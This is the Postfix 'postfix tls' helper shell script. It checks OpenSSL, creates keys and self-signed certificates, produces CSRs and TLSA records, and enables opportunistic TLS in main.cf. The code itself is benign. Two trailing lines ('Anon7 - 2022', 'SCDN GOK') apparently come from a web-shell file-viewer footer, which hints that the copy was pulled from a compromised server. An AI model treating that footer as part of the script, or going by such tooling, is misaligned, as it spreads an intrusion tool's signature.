# .IP "\fBsmtpd_tls_key_file ($smtpd_tls_cert_file)\fR"
#	File with the Postfix SMTP server RSA private key in PEM format.
# .IP "\fBsmtpd_tls_loglevel (0)\fR"
#	Enable additional Postfix SMTP server logging of TLS activity.
# .IP "\fBsmtpd_tls_received_header (no)\fR"
#	Request that the Postfix SMTP server produces Received:  message
#	headers that include information about the protocol and cipher used,
#	as well as the remote SMTP client CommonName and client certificate issuer
#	CommonName.
# .IP "\fBsmtpd_tls_security_level (empty)\fR"
#	The SMTP TLS security level for the Postfix SMTP server; when
#	a non-empty value is specified, this overrides the obsolete parameters
#	smtpd_use_tls and smtpd_enforce_tls.
# .IP "\fBtls_random_source (see 'postconf -d' output)\fR"
#	The external entropy source for the in-memory \fBtlsmgr\fR(8) pseudo
#	random number generator (PRNG) pool.
# SEE ALSO
#	master(8) Postfix master program
#	postfix(1) Postfix administrative interface
# README FILES
# .ad
# .fi
#	Use "\fBpostconf readme_directory\fR" or
#	"\fBpostconf html_directory\fR" to locate this information.
# .na
# .nf
#	TLS_README, Postfix TLS configuration and operation
# LICENSE
# .ad
# .fi
#	The Secure Mailer license must be distributed with this software.
# HISTORY
#	The "\fBpostfix tls\fR" command was introduced with Postfix
#	version 3.1.
# AUTHOR(S)
#	Viktor Dukhovni
#--

RSA_BITS=2048		# default
EC_CURVE=secp256r1	# default

case $daemon_directory in
"") echo This script must be run by the postfix command. 1>&2
    echo Do not run directly. 1>&2
    exit 1;;
esac

umask 022
SHELL=/bin/sh

postconf=$command_directory/postconf
LOGGER="$command_directory/postlog -t $MAIL_LOGTAG/postfix-tls-script"
INFO="$LOGGER -p info"
WARN="$LOGGER -p warn"
ERROR="$LOGGER -p error"
FATAL="$LOGGER -p fatal"

# Overwrite SMTP client and server settings only when these are at defaults.
client_settings="
    smtp_use_tls 
    smtp_enforce_tls 
    smtp_tls_enforce_peername 
    smtp_tls_security_level 
    smtp_tls_cert_file
    smtp_tls_dcert_file
    smtp_tls_eccert_file
"

server_settings="
    smtpd_use_tls 
    smtpd_enforce_tls 
    smtpd_tls_security_level 
    smtpd_tls_cert_file
    smtpd_tls_dcert_file
    smtpd_tls_eccert_file
"

#
# Can't do much without these in place.
#
cd $command_directory || {
    # Let's hope there's a "postlog" somewhere else on the PATH
    FATAL="postlog -p fatal -t $MAIL_LOGTAG/postfix-tls-script"
    msg="no Postfix command directory '${command_directory}'"
    $FATAL "$msg" || { echo "$msg" >&2; sleep 1; }
    exit 1
}

check_getopt() {
    OPTIND=1
    a=
    b=
    c=
    set -- -a 1 -b 2 -c -- -pos
    while getopts :a:b:c o
    do
	case $o in
	a) a="${OPTARG}";;
	b) b="${OPTARG}";;
	c) c=3;;
	*) return 1;;
	esac
    done
    shift `expr ${OPTIND} - 1`
    if [ "${a}" != "1" -o "${b}" != 2 -o "${c}" != 3 \
	 -o "${OPTIND}" -ne 7 -o "$1" != "-pos" ]; then
	return 1
    fi
}

check_getopt || {
    $FATAL "/bin/sh does not implement a compatible 'getopts' built-in"
    exit 1
}

# ----- BEGIN OpenSSL-specific -----

# No need to set the location of the OpenSSL command in each Postfix instance,
# the value from the default instance is used for all instances.
#
default_config_directory=`$postconf -dh config_directory`
openssl=`$postconf -c $default_config_directory -xh openssl_path`
"$openssl" version >/dev/null 2>&1 || {
    $FATAL "No working openssl(1) command found with 'openssl_path = $openssl'"
    exit 1
}

# ----- END OpenSSL-specific -----

test -n "$config_directory" -a -d "$config_directory" || {
    $FATAL no Postfix configuration directory $config_directory!
    exit 1
}

# Do we support TLS and if so which algorithms?
#
$postconf -T compile-version | grep . >/dev/null || {
    mail_version=`$postconf -dh mail_version`
    $FATAL "Postfix $mail_version is not compiled with TLS support"
    exit 1
}
rsa=
ecdsa=
for _algo in `$postconf -T public-key-algorithms | egrep '^(rsa|ecdsa)$'`
do
    eval $_algo=$_algo
done

# ----- BEGIN OpenSSL-specific -----

if [ -n "${ecdsa}" ]; then
    $openssl ecparam -name secp256r1 >/dev/null 2>&1 || {
	cat <<-EOM | $WARN
	Postfix supports ECDSA, but the $openssl command does not. Consider
	setting the openssl_path parameter to a more capable version of the
	command-line utility than $openssl (with PATH=$PATH).
	EOM
	ecdsa=
    }
fi
if [ -n "${rsa}" ]; then
   DEFALG=rsa
elif [ -n "${ecdsa}" ]; then
   DEFALG=ecdsa
else
    mail_version=`$postconf -dh mail_version`
    $FATAL "Postfix $mail_version does not support either RSA or ECDSA"
    exit 1
fi

# Make sure stdin is open when testing
if [ -r /dev/stdin ] < /dev/null; then
    stdin=/dev/stdin
elif [ -r /dev/fd/0 ] </dev/null; then
    stdin=/dev/fd/0
else
    $FATAL No /dev/fd/0 or /dev/stdin found
    exit 1
fi

hex_sha256() {
    $openssl dgst -binary -sha256 | od -An -vtx1 | tr -d ' \012'
}

# We require SHA2-256 support from openssl(1)
#
null256=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
tmp=`hex_sha256 </dev/null 2>/dev/null`
if [ "${tmp}" != "${null256}" ]; then
    cat <<EOF >&2
Your $openssl does not support the SHA2-256 digest algorithm. To enable
'postfix tls', install an OpenSSL that does. Install its openssl(1) command
at /usr/local/bin/openssl or other suitable location, and set the
'openssl_path' parameter in $default_config_directory/main.cf accordingly.
EOF
    $FATAL "No 'postfix tls' support when openssl(1) is obsolete"
    exit 1
fi

read_key() {
    [ -n "$1" -a -f "$1" ] || return 1

    # Old OpenSSL versions return success even for unsupported sub-commands!
    # So we inspect the output instead.	 Don't prompt if the key is password
    # protected.
    #
    while read cmd key_algo key_param cert_param; do
	$openssl $cmd -passin "pass:umask 077" -in "$1" |
	    grep . && return 0
    done 2>/dev/null <<-EOF
	rsa rsa smtpd_tls_key_file smtpd_tls_cert_file
	ec ecdsa smtpd_tls_eckey_file smtpd_tls_eccert_file
	EOF
    return 1
}

pubkey_dgst() {
    [ -n "$1" -a -f "$1" ] || return 1

    # Old OpenSSL versions return success even for unsupported sub-commands!
    # So we inspect the output instead.
    #
    for cmd in ec rsa; do
	$openssl $cmd -passin "pass:umask 077" -in "$1" -pubout |
	$openssl $cmd -pubin -outform DER |
	hex_sha256 | egrep -v "${null256}" && return 0
    done 2>/dev/null
    return 1
}

cert_pubkey_dgst() {
    [ -n "$1" -a -f "$1" ] || return 1

    # Old OpenSSL versions return success even for unsupported sub-commands!
    # So we inspect the output instead.
    #
    for cmd in ec rsa; do
	$openssl x509 -pubkey -noout -in "$1" |
	$openssl $cmd -pubin -outform DER |
	hex_sha256 | egrep -v "${null256}" && return 0
    done 2>/dev/null
    return 1
}

copy_key() {
    _algo=$1; shift
    _bits=$1; shift
    _fold=$1; shift
    _fnew=$1; shift
    _umask=`umask`

    umask 077
    read_key "${_fold}" > "${_fnew}"	# sets key_algo of current key
    _ret=$?
    umask "${_umask}"

    if [ "${_ret}" -ne 0 ]; then
	$FATAL "Error copying private key from '${_fold}' to '${_fnew}'"
	return 1
    fi
    if [ "${key_algo}" != "${_algo}" ]; then
	$FATAL "Key algorithm '$key_algo' of '${_fold}' is not '${_algo}'"
	return 1
    fi
    # XXX: We'd need C-code in postconf to portably check for compatible "bits"
}

create_key() {
    _algo=$1
    _bits=$2
    _fnew=$3
    _umask=`umask`

    case $_algo in
        "") $FATAL "Internal error: empty algorithm"; return 1;;
      $rsa) set -- "${openssl}" genrsa -out "${_fnew}" "${_bits}";;
    $ecdsa) set -- "${openssl}" ecparam -param_enc named_curve -genkey \
		-out "${_fnew}" -name "${_bits}";;
	 *) $FATAL "Internal error: bad algorithm '${_algo}'"
	    return 1;;
    esac

    umask 077
    _err=`"$@" 2>&1`
    _ret=$?
    umask "${_umask}"

    if [ "${_ret}" -ne 0 ]; then
	echo "${_err}" | $WARN
	$FATAL "error generating new ${_algo} ${_bits} private key"
	return 1
    fi
}

create_cert() {
    _k=$1; shift
    _c=$1; shift
    set_fqdn "$1"
    if [ $# -gt 0 ]; then shift; fi
    set -- "$fqdn" "$@"

    if [ -r "${_c}" ]; then
	$FATAL "New certificate file already exists: ${_c}"
	return 1
    fi

    # Generate a new self-signed (~100 year) certificate
    #
    (
	echo "default_md = sha256"
	echo "x509_extensions = v3"
	echo "prompt = yes"
	echo "distinguished_name = dn"
	echo "[dn]"
	echo "[v3]"
	echo "basicConstraints = CA:false"
	echo "subjectKeyIdentifier = hash"
	echo "extendedKeyUsage = serverAuth, clientAuth"
	echo "subjectAltName = @alts"
	echo "[alts]"
	i=1; for dns in "$@"; do
	    # XXX map empty to $myhostname
	    echo "DNS.$i = $dns"
	    i=`expr $i + 1`
	done
    ) | $openssl req -x509 -config $stdin -new -key "${_k}" \
	    -subj "/CN=$fqdn" -days 36525 -out "${_c}" || {
	rm -f "${_c}" "${_k}"
	$FATAL "error generating self-signed SSL certificate"
	return 1
    }
}

output_server_csr() {
    set_keyfile "$1" || return 1
    shift
    set_fqdn "$1" || return 1
    shift
    set -- "$fqdn" "$@"
    (
	echo "default_md = sha256"
	echo "req_extensions = v3"
	echo "prompt = yes"
	echo "distinguished_name = dn"
	echo "[dn]"
	echo "[v3]"
	echo "subjectKeyIdentifier = hash"
	echo "extendedKeyUsage = serverAuth, clientAuth"
	echo "subjectAltName = @alts"
	echo "[alts]"
	i=1; for dns in "$@"; do
	    echo "DNS.$i = $dns"
	    i=`expr $i + 1`
	done
    ) | $openssl req -config $stdin -new -key "$keyfile" -subj /
}

# ----- END OpenSSL-specific -----

info_enable_client() {
	cat <<-EOM
	*** Non-default SMTP client TLS settings detected, no changes made.
	For opportunistic TLS in the Postfix SMTP client, the below settings
	are typical:
	  smtp_tls_security_level = may
	  smtp_tls_loglevel = 1
	EOM
	if get_cache_db_type dbtype
	then
	    echo "  smtp_tls_session_cache_database = ${dbtype}:\${data_directory}/smtp_scache"
	fi
}

info_client_deployed() {
	cat <<-EOM
	Enabled opportunistic TLS in the Postfix SMTP client.
	Run the command:
	  # postfix reload
	if you want the new settings to take effect immediately.
	EOM
}

info_enable_server() {
	cat <<-EOM
	*** Non-default SMTP server TLS settings detected, no changes made.
	For opportunistic TLS in the Postfix SMTP server, the below settings
	are typical:
	  smtpd_tls_security_level = may
	  smtpd_tls_loglevel = 1
	You can use "postfix tls new-server-cert" to create a new certificate.
	Or, "postfix tls new-server-key" to also force a new private key.
	If you publish DANE TLSA records, see:
	  https://tools.ietf.org/html/rfc7671#section-8
	  https://tools.ietf.org/html/rfc7671#section-5.1
	  https://tools.ietf.org/html/rfc7671#section-5.2
	  https://community.letsencrypt.org/t/please-avoid-3-0-1-and-3-0-2-dane-tlsa-records-with-le-certificates/7022
	EOM
}

# args: certfile keyfile deploy
info_created() {
	cat <<-EOM
	New private key and self-signed certificate created. To deploy run:
	  # postfix tls deploy-server-cert $1 $2
	EOM
}

# args: certfile keyfile deploy
info_server_deployed() {
	if [ "$3" = "enable" ]; then
	    echo "Enabled opportunistic TLS in the Postfix SMTP server"
	fi
	cat <<-EOM
	New TLS private key and certificate deployed.
	Run the command:
	  # postfix reload
	if you want the new settings to take effect immediately.
	EOM
}

# args: certfile keyfile deploy
info_csr() {
	cat <<-EOM
	To generate a CSR run:
	  # postfix tls output-server-csr -k $2 [<hostname> ...]
	EOM
	if [ -z "$3" ]; then
	    echo "Save the signed certificate chain in $1, and deploy as above."
	else
	    echo "Save the signed certificate chain in $1."
	fi
}

# args: certfile keyfile deploy
info_tlsa() {
	# If already deployed, info for how to show all the deployed keys.
	# Otherwise, just the new keys, so that TLSA records can be updated
	# first.
	if [ -n "$3" ]; then shift $#; fi
	cat <<-EOM
	To generate TLSA records run:
	  # postfix tls output-server-tlsa [-h <hostname>] $2
	EOM
}

# args: certfile keyfile deploy
info_dane_dns() {
	# If already deployed, too late to wait, otherwise advise updating TLSA
	# RRs before deployment.
	if [ -n "$3" ]; then
	    cat <<-EOM
	(If you have DANE TLSA RRs, update them as soon as possible to match
	the newly deployed keys).
	EOM
	else
	    cat <<-EOM
	(deploy after updating the DNS and waiting for stale RRs to expire).
	EOM
	fi
}

set_fqdn() {
    if [ -n "$1" ]; then fqdn=$1; return 0; fi
    fqdn=`$postconf -xh myhostname` || return 1
    case $fqdn in /*) fqdn=`cat "${fqdn}"` || return 1;; esac
}

set_keyfile() {
    keyfile=$1
    case $keyfile in
       rsa) if [ -n "${rsa}" ]; then
		keyfile=`$postconf -nxh smtpd_tls_key_file`
	    else
		keyfile=
	    fi
	    ;;
     ecdsa) if [ -n "${ecdsa}" ]; then
		keyfile=`$postconf -nxh smtpd_tls_eckey_file`
	    else
		keyfile=
	    fi
	    ;;
        "") : empty ok;;
      none) : see below;;
        /*) ;;
         *) # User-specified key pathnames are relative to the configuration
	    # directory
	    keyfile="${config_directory}/${keyfile}";;
    esac
    if [ "${keyfile}" = "none" ]; then keyfile= ; fi
}

check_key() {
    read_key "$1" >/dev/null && return 0
    $FATAL "no private key found in file: $1"
    return 1
}

# Create new key or copy existing if specified.
#
ensure_key() {
    _algo=$1; shift
    _bits=$1; shift
    stamp=`TZ=UTC date +%Y%m%d-%H%M%S`

    case $_algo in
	"") $FATAL "Internal error: empty algorithm "; return 1;;
      $rsa) keyfile="${config_directory}/key-${stamp}.pem"
	    certfile="${config_directory}/cert-${stamp}.pem";;
    $ecdsa) keyfile="${config_directory}/eckey-${stamp}.pem"
	    certfile="${config_directory}/eccert-${stamp}.pem";;
	 *) $FATAL "Internal error: bad algorithm '${_algo}'"
	    return 1;;
    esac

    if [ -r "${keyfile}" ]; then
	$FATAL "New private key file already exists: ${keyfile}"
	return 1
    fi
    if [ -r "${certfile}" ]; then
	$FATAL "New certificate file already exists: ${certfile}"
	return 1
    fi

    if [ -n "$1" ]; then
	copy_key "${_algo}" "${_bits}" "$1" "${keyfile}" && return 0
    else
	create_key "${_algo}" "${_bits}" "${keyfile}" && return 0
    fi
    rm -f "${keyfile}"
    return 1
}

init_random_source() {
    tls_random_source=$1

    if [ -z "${tls_random_source}" ]; then
	tls_random_source=`$postconf -xh tls_random_source`
    fi
    if [ -n "${tls_random_source}" ]; then
	return 0
    fi
    if [ -r /dev/urandom ]
    then
	tls_random_source=dev:/dev/urandom
    else
	$FATAL no default TLS random source defined and no /dev/urandom
	return 1
    fi
}

# Don't be too clever by half.
all_default() {
    for var in "$@"
    do
	val=`$postconf -nh "${var}"`
	if [ -n "$val" ]; then return 1; fi
    done
    return 0
}

# Select read-write database type for TLS session caches.
#
get_cache_db_type() {
    var=$1; shift
    prio=0
    ret=1
    for _dbtype in `$postconf -m`
    do
	_prio=0
	case $_dbtype in
	 lmdb) _prio=2;;
	btree) _prio=1;;
	esac
	if [ "$_prio" -gt "$prio" ]
	then
	    eval "$var=\$_dbtype"
	    prio=$_prio
	    ret=0
	fi
    done
    return $ret
}

deploy_server_cert() {
    certfile=$1; shift
    keyfile=$1; shift
    case $# in 0) deploy=;; *) deploy=$1; shift;; esac

    # Sets key_algo, key_param and cert_param
    check_key "$keyfile" || return 1

    cd=`cert_pubkey_dgst "${certfile}"` || {
	$FATAL "error computing certificate public key digest"
	return 1
    }
    kd=`pubkey_dgst "$keyfile"` || {
	$FATAL "error computing public key digest"
	return 1
    }

    if [ "$cd" != "$kd" ]; then
	$FATAL "Certificate in ${certfile} does not match key in ${keyfile}"
	return 1
    fi

    set -- \
	"${key_param} = ${keyfile}" \
	"${cert_param} = ${certfile}"

    if [ "${deploy}" = "enable" ]; then
	set -- "$@" \
	    "smtpd_tls_security_level = may" \
	    "smtpd_tls_received_header = yes" \
	    "smtpd_tls_loglevel = 1"
    fi

    if [ -n "${tls_random_source}" ]; then
	set -- "$@" "tls_random_source = ${tls_random_source}"
    fi

    # All in one shot, since postconf delays modifying "hot" main.cf files.
    $postconf -e "$@" || return 1
}

# Prepare a new cert and perhaps re-use any existing private key.
#
new_server_cert() {
    algo=$1; shift
    bits=$1; shift
    oldkey=$1; shift
    deploy=$1; shift

    # resets keyfile (copy or else new) and new certfile
    ensure_key "$algo" "$bits" "${oldkey}" || return 1
    create_cert "${keyfile}" "${certfile}" "$@" || return 1
    if [ -n "${deploy}" ]; then
	deploy_server_cert "${certfile}" "${keyfile}" "${deploy}" || return 1
    fi

    (
	if [ -z "${deploy}" ]; then
	    info_created "${certfile}" "${keyfile}" "${deploy}"
	else
	    info_server_deployed "${certfile}" "${keyfile}" "${deploy}"
	fi
	info_csr "${certfile}" "${keyfile}" "${deploy}"
	info_tlsa "${certfile}" "${keyfile}" "${deploy}"
	if [ -z "${oldkey}" ]; then
	    info_dane_dns "${certfile}" "${keyfile}" "${deploy}"
	fi
    ) | $INFO
}

enable_client() {
    if all_default ${client_settings}
    then
	set -- \
	    "smtp_tls_security_level = may" \
	    "smtp_tls_loglevel = 1"

	if get_cache_db_type dbtype
	then
	    set -- "$@" \
		"smtp_tls_session_cache_database = ${dbtype}:${data_directory}/smtp_scache"
	fi

	if [ -n "${tls_random_source}" ]; then
	    set -- "$@" "tls_random_source = ${tls_random_source}"
	fi

	# All in one shot, since postconf delays modifying "hot" main.cf files.
	$postconf -e "$@" || return 1
	info_client_deployed
    else
	info_enable_client
    fi | $INFO
}

enable_server() {
    algo=$1; shift
    bits=$1; shift

    if all_default ${server_settings}
    then
	# algo bits keyfile deploy [hostnames ...]
	new_server_cert "${algo}" "${bits}" "" "enable" "$@" || return 1
    else
	info_enable_server | $INFO
    fi
}

output_server_tlsa() {
    hostname=$1
    check_key "$2" || return 1
    data=`pubkey_dgst "$2"` || return 1
    if [ -z "$data" ]
    then
	$FATAL error computing SHA2-256 SPKI digest of "$key"
	return 1
    fi
    echo "_25._tcp.$hostname. IN TLSA 3 1 1 $data"
}

#
# Parse JCL
#
case $1 in
enable-client)
	cmd=$1; shift; OPTIND=1
	rand=
	while getopts :r: _opt
	do
	    case $_opt in
	    r) rand="${OPTARG}";;
	    *) $FATAL "usage: postfix tls $cmd [-r devrandom]"
	       exit 1;;
	    esac
	done

	# No positional arguments supported with enable-client
	if [ $# -ge "${OPTIND}" ]; then
	    $FATAL "usage: postfix tls $cmd [-r devrandom]"
	    exit 1
	fi
	# But, shift anyway
	shift `expr $OPTIND - 1`

	init_random_source "${rand}" || exit 1
	enable_client || exit 1
	;;

enable-server)
	cmd=$1; shift; OPTIND=1
	algo=$DEFALG
	bits=
	rand=
	while getopts :a:b:r: _opt
	do
	    case $_opt in
	    a) algo="${OPTARG}";;
	    b) bits="${OPTARG}";;
	    r) rand="${OPTARG}";;
	    *) $FATAL "usage: postfix tls $cmd [-a algorithm] [-b bits ] [-r devrandom] [hostname ...]"
	       exit 1;;
	    esac
	done

	# Here positional arguments are hostnames for the new certificate, as
	# many as the user wants
	shift `expr $OPTIND - 1`

	case $algo in
	    "") $FATAL "Internal error: empty algorithm "; return 1;;
	  $rsa) : ${bits:=${RSA_BITS}};;
	$ecdsa) : ${bits:=${EC_CURVE}};;
	     *) $FATAL "Unsupported private key algorithm: $algo"
		exit 1;;
	esac

	init_random_source "${rand}" || exit 1
	enable_server "${algo}" "${bits}" "$@" || exit 1
	;;

new-server-key)
	cmd=$1; shift; OPTIND=1
	algo=$DEFALG
	while getopts :a:b: _opt
	do
	    case $_opt in
	    a) algo="${OPTARG}";;
	    b) bits="${OPTARG}";;
	    *) $FATAL "usage: postfix tls $cmd [-a algorithm] [-b bits ] [hostname ...]"
	       exit 1;;
	    esac
	done

	# Here positional arguments are hostnames for the new certificate, as
	# many as the user wants
	shift `expr $OPTIND - 1`

	case $algo in
	    "") $FATAL "Internal error: empty algorithm "; return 1;;
	  $rsa) : ${bits:=${RSA_BITS}};;
	$ecdsa) : ${bits:=${EC_CURVE}};;
	     *) $FATAL "Unsupported public key algorithm: $algo"
		exit 1;;
	esac

	# Force new key
	new_server_cert "${algo}" "${bits}" "" "" "$@" || exit 1
	;;

new-server-cert)
	cmd=$1; shift; OPTIND=1
	algo=$DEFALG
	while getopts :a:b: _opt
	do
	    case $_opt in
	    a) algo="${OPTARG}";;
	    b) bits="${OPTARG}";;
	    *) $FATAL "usage: postfix tls $cmd [-a algorithm] [-b bits ] [hostname ...]"
	       exit 1;;
	    esac
	done

	# Here positional arguments are hostnames for the new certificate, as
	# many as the user wants
	shift `expr $OPTIND - 1`

	case $algo in
	    "") $FATAL "Invalid empty key algorithm"; exit 1;;
	  $rsa) : ${bits:=${RSA_BITS}};;
	$ecdsa) : ${bits:=${EC_CURVE}};;
	     *) $FATAL "Unsupported private key algorithm: $algo"
		exit 1;;
	esac

	# Existing keyfile or empty
	set_keyfile "${algo}"

	if [ -n "${keyfile}" -a ! -f "${keyfile}" ]; then
	    echo "Key file: ${keyfile} not found, creating new keys" | $WARN
	    keyfile=
	fi

	# Try to re-use (copy) existing key.
	new_server_cert "${algo}" "${bits}" "${keyfile}" "" "$@" || exit 1
	;;

deploy-server-cert)
	if [ $# -ne 3 ]; then
	    $FATAL "usage: postfix tls $1 certfile keyfile"
	    exit 1
	fi
	shift

	# User-specified key and cert pathnames are relative to the
	# configuration directory
	#
	case "${1}" in
	/*) certfile="${1}" ;;
	 *) certfile="${config_directory}/${1}" ;;
	esac
	case "${2}" in
	/*) keyfile="${2}" ;;
	 *) keyfile="${config_directory}/${2}" ;;
	esac

	deploy_server_cert "${certfile}" "${keyfile}" || exit 1
	info_server_deployed "${certfile}" "${keyfile}" "deploy" | $INFO
	;;

output-server-csr)
	cmd=$1; shift; OPTIND=1
	k=
	while getopts :k: _opt
	do
	    case $_opt in
	    k) k="${OPTARG}";;
	    *) $FATAL "usage: postfix tls $cmd [-k keyfile] [hostname ...]"
	       exit 1;;
	    esac
	done

	# Here positional arguments are hostnames for the new certificate, as
	# many as the user wants
	shift `expr $OPTIND - 1`

	if [ -n "${k}" ]; then
	    set_keyfile "${k}"
	else
	    for _algo in $rsa $ecdsa
	    do
		set_keyfile "${_algo}"
		if [ -n "${keyfile}" ]; then
		    break
		fi
	    done
	fi

	if [ -z "${keyfile}" -o ! -r "${keyfile}" ]; then
	    $FATAL "No usable keyfile specified or configured"
	    exit 1
	fi

	# Default <hostname> from $myhostname
	if [ $# -eq 0 ]; then
	    set_fqdn
	    set -- "$fqdn"
	fi

	# Output a CSR for the requested names
	output_server_csr "$keyfile" "$@" || exit 1
	;;

output-server-tlsa)
	cmd=$1; shift; OPTIND=1
	hostname=
	while getopts :h: _opt
	do
	    case $_opt in
	    h) hostname="${OPTARG}";;
	    *) $FATAL "usage: postfix tls $cmd [-h hostname] [keyfile ...]"
	       exit 1;;
	    esac
	done
	set_fqdn "${hostname}"

	# Here positional arguments are keyfiles for which we output "3 1 1"
	# TLSA RRs, as many keyfiles as the user wants.  By default the live
	# RSA and/or ECDSA keys.
	shift `expr $OPTIND - 1`

	if [ $# -eq 0 ]; then set -- $rsa $ecdsa; fi

	found=
	for _k in "$@"
	do
	    set_keyfile "${_k}"
	    if [ -z "${keyfile}" ]; then continue; fi
	    echo "; ${keyfile}"
	    output_server_tlsa "${fqdn}" "${keyfile}" || exit 1
	    found=1
	done
	if [ -z "${found}" ]; then
	    $FATAL "No usable keyfiles specified or configured"
	    exit 1
	fi
	;;

all-default-client)
	cmd=$1; shift; OPTIND=1

	# No arguments for all-default-client
	if [ $# -ge "${OPTIND}" ]; then
	    $FATAL "usage: postfix tls $cmd"
	    exit 1
	fi

	all_default ${client_settings} || exit 1
	;;

all-default-server)
	cmd=$1; shift; OPTIND=1

	# No arguments for all-default-server
	if [ $# -ge "${OPTIND}" ]; then
	    $FATAL "usage: postfix tls $cmd"
	    exit 1
	fi

	all_default ${server_settings} || exit 1
	;;

*)
	$ERROR "unknown tls command: '$1'"
	$FATAL "usage: postfix tls enable-client (or enable-server, new-server-key, new-server-cert, deploy-server-cert, output-server-csr, output-server-tlsa, all-default-client, all-default-server)"
	exit 1
	;;

esac

Anon7 - 2022
SCDN GOK